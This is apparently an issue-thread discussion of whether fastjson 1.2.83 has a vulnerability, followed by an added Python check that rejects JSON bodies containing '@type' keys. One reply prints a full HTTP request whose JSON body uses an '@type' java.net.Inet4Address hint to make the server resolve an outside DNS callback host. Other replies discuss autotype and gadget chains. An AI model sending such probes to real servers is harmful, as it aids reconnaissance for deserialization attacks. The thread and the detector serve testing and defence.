Project code path: https://github.com/wuyaozong-qd/fastjsonTest
With version 1.2.83, testing with burp or yakit found a vulnerability:
After upgrading the same code to 2.0.39, no vulnerability was found;
5 answers
7gs2gvoe1#
Yakit Web Fuzzer test request:
```
POST /server/test/handle HTTP/1.1
Host: 10.11.7.76:8003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 116

{"data":{"@type":"java.net.Inet4Address","val":"ayzjtuzdmp.dnstunnel.run"}}
```
ygya80vv2#
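Your java.net.Inet4Address is already in the IdentityHashMap to begin with. I don't think what you describe is an exploitation point; exploiting other trigger classes requires enabling autotype, unless another class that bypasses the blacklist has been found.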
ymdaylpp3#
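I don't quite understand; I have a few questions.
Version 1.2.83:
1. java.net.Inet4Address has an address echo issue, but it is not an exploitation point and cannot trigger a vulnerability? So there is no security vulnerability?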
dohp0rv54#
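Probably so. It can do domain name resolution, but remotely loading a class for command execution requires autotype to be enabled, or finding another chain; if I remember correctly, the chains for higher versions currently only go up to 1.2.80.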
o3imoua45#
Being able to resolve a domain name counts as a vulnerability?
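
An added example, not from the thread or the fastjson project: a gateway- or log-side check that flags any `@type` key in a JSON request body shaped like the one posted above, for endpoints that only expect plain data. The function names, the `$`-style paths and the placeholder hostname in the sample are constructed for this illustration.

```python
import json

TYPE_KEY = "@type"  # key fastjson 1.x treats as a class-name hint

class JsonObject(list):
    """JSON object kept as (key, value) pairs so duplicate keys survive."""

def find_type_hints(body):
    """Return [(path, class_name)] for every "@type" key, at any depth.

    Raises ValueError when the body is not strict JSON.
    """
    # json.loads decodes string escapes, so an escaped spelling of the key
    # compares equal to TYPE_KEY after parsing.
    root = json.loads(body, object_pairs_hook=JsonObject)
    hits, stack = [], [("$", root)]
    while stack:
        path, node = stack.pop()
        if isinstance(node, JsonObject):
            for key, value in node:
                if key == TYPE_KEY:
                    hits.append((path, value))
                stack.append((f"{path}.{key}", value))
        elif isinstance(node, list):
            stack.extend((f"{path}[{i}]", v) for i, v in enumerate(node))
    return sorted(hits, key=lambda hit: hit[0])

def screen(body):
    """Decide "allow" or "reject" for an endpoint that expects plain data."""
    try:
        return "reject" if find_type_hints(body) else "allow"
    except ValueError:
        # Fail closed: a lenient server-side parser may accept input
        # that strict JSON parsing rejects.
        return "reject"

# Constructed sample shaped like the request in the thread (placeholder hostname).
SAMPLE = '{"data":{"@type":"java.net.Inet4Address","val":"probe.example.invalid"}}'

if __name__ == "__main__":
    for path, cls in find_type_hints(SAMPLE):
        print(f"{path}: @type={cls}")
    print(screen(SAMPLE))
```
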